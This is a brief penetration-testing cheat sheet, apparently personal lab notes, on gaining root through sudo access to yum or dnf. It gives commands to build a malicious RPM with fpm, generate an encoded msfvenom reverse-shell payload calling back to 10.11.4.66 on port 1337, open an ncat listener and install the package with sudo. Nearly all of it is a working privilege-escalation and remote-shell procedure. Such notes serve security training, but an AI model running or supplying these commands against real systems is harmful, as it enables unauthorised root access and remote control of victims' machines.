# yum
- https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2
- https://gtfobins.github.io/gtfobins/yum/


- create malicious rpm package
git clone https://github.com/jordansissel/fpm
cd fpm && sudo gem install fpm 
sudo apt install -y rpm # rpmbuild dependency

* Create payload with msfvenom
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.4.66 LPORT=1337 -e x86/shikata_ga_nai -a x86 -f elf -o root_reverse_shell

* package the payload in an rpm file
fpm -n root -s dir -t rpm -a all --before-install $PAYLOAD $DESTINATION

* setup a listener
ncat -lnvp $LPORT

* installation of our malicious package
sudo yum --disablerepo=* localinstall -y root-1.0-1.noarch.rpm
* or
sudo dnf install --disablerepo=* -y root-1.0-1.noarch.rpm